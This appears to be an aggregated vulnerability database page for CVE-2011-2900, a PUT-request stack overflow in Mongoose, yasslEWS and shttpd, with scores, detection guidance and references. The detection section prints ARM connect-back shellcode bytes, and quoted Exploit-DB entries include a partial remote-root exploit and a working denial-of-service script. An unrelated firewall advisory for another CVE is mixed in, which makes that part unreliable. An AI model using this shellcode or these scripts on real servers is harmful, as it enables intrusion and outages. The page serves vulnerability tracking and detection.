CVE-2011-2900
published 2011-08-05CVE-2011-2900: Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server…
PriorityP273high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
13.26%
95.9th percentile
Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| shttpd | shttpd | — | — |
| valenok | mongoose | — | — |
| yassl | yasslews | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c
- →Detect HTTP PUT requests with excessively long path segments (>107 bytes) targeting the root or directory paths, indicative of buffer overflow exploitation against put_dir() ↗
- →Look for ARM connect-back shellcode pattern in HTTP PUT request body/path: URL-encoded bytes starting with %01%10%8F%E2%11%FF%2F%E1 ↗
- →The exploit targets port 80 with HTTP/1.0 PUT requests; monitor for repeated stack-lifting gadget pattern '%a0%ce%31%40' appearing multiple times (26+) in a single PUT request URI ↗
- →The vulnerability is only exploitable for RCE when the server is NOT compiled with -DNDEBUG; when compiled with assert enabled (default Fedora), the result is DoS only via assert abort ↗
- →Exploitation was observed in the wild in 2011 against sfr/ubiquisys femtocell webservers running shttpd/mongoose; prioritize detection on embedded/IoT HTTP servers ↗
- ·RCE is only achievable when the vulnerable server is compiled WITHOUT -DNDEBUG; servers compiled with assert enabled (e.g., default Fedora builds) will crash/DoS instead of allowing code execution ↗
- ·The RCE exploit's shellcode address (SHELLCODE = 0xbc568) and heap layout assumptions are specific to the sfr/ubiquisys femtocell target where the heap is not randomized; ASLR-enabled systems require different offsets ↗
- ·The RCE exploit uses ARM-architecture ROP gadgets and shellcode; it is not directly applicable to x86/x86-64 deployments of the same vulnerable software ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3jhp-7x6r-7792: Stack-based buffer overflow in the (1) put_dir function in mongoose
ghsa_unreviewed·2022-05-17
CVE-2011-2900 [HIGH] CWE-119 GHSA-3jhp-7x6r-7792: Stack-based buffer overflow in the (1) put_dir function in mongoose
Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
VulnCheck
shttpd shttpd Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2011·CVSS 7.5
CVE-2011-2900 [HIGH] shttpd shttpd Improper Restriction of Operations within the Bounds of a Memory Buffer
shttpd shttpd Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
Affected: shttpd shttpd
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2011-2900; https://www.cve.org/CVERecord?id=CVE-2011-2900
No detection rules found.
Exploit-DB
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow
exploitdb·2011-08-15·CVSS 7.5
CVE-2011-2900 [HIGH] Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow
---
#!/usr/bin/env python
# part of femtocell research by TU-Berlin
# only for educational purposes
# Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
# Date: 2011-08-02
# Author: nion
# Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/
# Version: shttpd "
sys.exit(-1)
target = sys.argv[1]
listener = sys.argv[2]
SHELLCODE = 0xbc568 # shellcode backup in connect struct, heap is not randomized
STACK_LIFT = "%a0%ce%31%40" # didnt want to use urllib to encode at this point
# because it moves the heap address depending on if character is printable or not
# and i was too lazy to adjust the payload when cleaning up the exploit :)
buf = "PUT /"
buf += "A" * 107 # first fil
Exploit-DB
Simple HTTPd 1.42 - Denial of Servive
exploitdb·2011-08-12
CVE-2011-2900 Simple HTTPd 1.42 - Denial of Servive
Simple HTTPd 1.42 - Denial of Servive
---
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()
Exploit-DB
Look n stop - Local Denial of Service
exploitdb·2011-01-21
CVE-2011-0652 Look n stop - Local Denial of Service
Look n stop - Local Denial of Service
---
#include
#include
#include
#include
#include
/*
Program : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage : http://www.looknstop.com
Discovery : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.
//----- Description of vulnerability
lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.
//----- Credit
Bugzilla
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir() [fedora-all]
bugzilla·2011-08-08·CVSS 7.5
CVE-2011-2900 [HIGH] CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir() [fedora-all]
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir() [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=729145
Please note: this issue affects
Bugzilla
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir()
bugzilla·2011-08-08·CVSS 7.5
CVE-2011-2900 [HIGH] CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir()
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir()
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2900 to
the following vulnerability:
Name: CVE-2011-2900
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2900
Assigned: 20110727
Reference: http://www.openwall.com/lists/oss-security/2011/08/03/5
Reference: http://www.openwall.com/lists/oss-security/2011/08/03/9
Reference: https://code.google.com/p/mongoose/source/detail?r=556f4de91eae4bac40dc5d4ddbd9ec7c424711d0
Reference: http://www.securityfocus.com/bid/48980
Reference: http://secunia.com/advisories/45464
Reference: http://xforce.iss.net/xforce/xfdb/68991
Stack-based buffer overflow in the (1) put_dir function in mongoose.c
in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL E
http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065273.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-September/065505.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-September/065537.htmlhttp://secunia.com/advisories/45464http://secunia.com/advisories/45902http://securityreason.com/securityalert/8337http://www.openwall.com/lists/oss-security/2011/08/03/5http://www.openwall.com/lists/oss-security/2011/08/03/9http://www.securityfocus.com/bid/48980https://code.google.com/p/mongoose/source/detail?r=556f4de91eae4bac40dc5d4ddbd9ec7c424711d0https://exchange.xforce.ibmcloud.com/vulnerabilities/68991http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065273.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-September/065505.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-September/065537.htmlhttp://secunia.com/advisories/45464http://secunia.com/advisories/45902http://securityreason.com/securityalert/8337http://www.openwall.com/lists/oss-security/2011/08/03/5http://www.openwall.com/lists/oss-security/2011/08/03/9http://www.securityfocus.com/bid/48980https://code.google.com/p/mongoose/source/detail?r=556f4de91eae4bac40dc5d4ddbd9ec7c424711d0https://exchange.xforce.ibmcloud.com/vulnerabilities/68991
2011-08-05
Published
Exploited in the wild